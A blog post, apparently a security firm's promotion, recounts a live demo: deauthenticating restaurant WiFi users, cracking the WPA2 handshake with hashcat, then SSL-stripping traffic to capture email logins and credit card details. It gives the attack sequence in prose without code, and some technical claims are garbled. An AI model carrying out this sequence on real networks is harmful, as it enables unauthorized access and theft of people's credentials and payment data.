Can we hack you in 10 minutes
Not to long ago I performed a public demonstration on how WPA2 passwords on Wireless Access Points can be cracked.
The title of our demonstration was ” Can we hack you in 10 minutes ” and the simple answer to that was yes.
We started the demonstration by scanning for Wireless networks close and far away from us. During the scan I picked-up the restaurants WiFi name and then targeted that specific device. I could see all devices and users connected to the AP and started with my attack. I proceeded to send de-authentication packets to the AP and had the audience watch their devices loose connectivity to the WiFi, funny as it was to them it actually happened and they were amazed. The reason for the de-authentication packets was in order to kick all the users from the WiFi and wait for them to reconnect so that I could steal the 4-way handshake.
What is a 4 way handshake ?
Putting it in layman’s terms it is the re-connection of your device to the WiFi and the two devices confirming that the password on the WiFi device and the Password on the users device matches before providing access.
Back to the attack
After capturing the 4 way handshake I ensured to receive as much data as possible. I used a program called Wireshark ( a network analysis program) to verify I had indeed captured the full 4 way handshake and then proceeded to cleanup the file for cracking into “hashcat”.
I have build a crack station out of 8 of the top range graphics cards used for crypto mining and uploaded the hash file to hashcat and it cracked the password within 14 seconds as the crack station can scan through 250 million passwords a second.
I can now login to the WiFi network.
But I did not stop there……..
Sniffing Network Packets for Passwords and Profit.
While being connected to the network I started with a typical Man-In-The-Middle attack and started an SSL stripper to catch any secure traffic and still provide the encrypted passwords in plane text bypassing the HSTS security protocol. Basically what this does is add a 4th w to the following line thereby removing the HSTS security and redirecting the traffic to normal HTTP requests.
I could see username names and passwords of users e-mail accounts as well as any site they logged into and extract the data needed to access their accounts.
I even managed to catch credit card details being used.
All of this in 10 minutes.
If you need proper security measures to be put into place then please call us for a consultation free of charge and we will be able to assist in securing your network.
Hope you enjoyed this . Gerhard Mohr- Ethical Hacker, SECURE ICT, IDAHO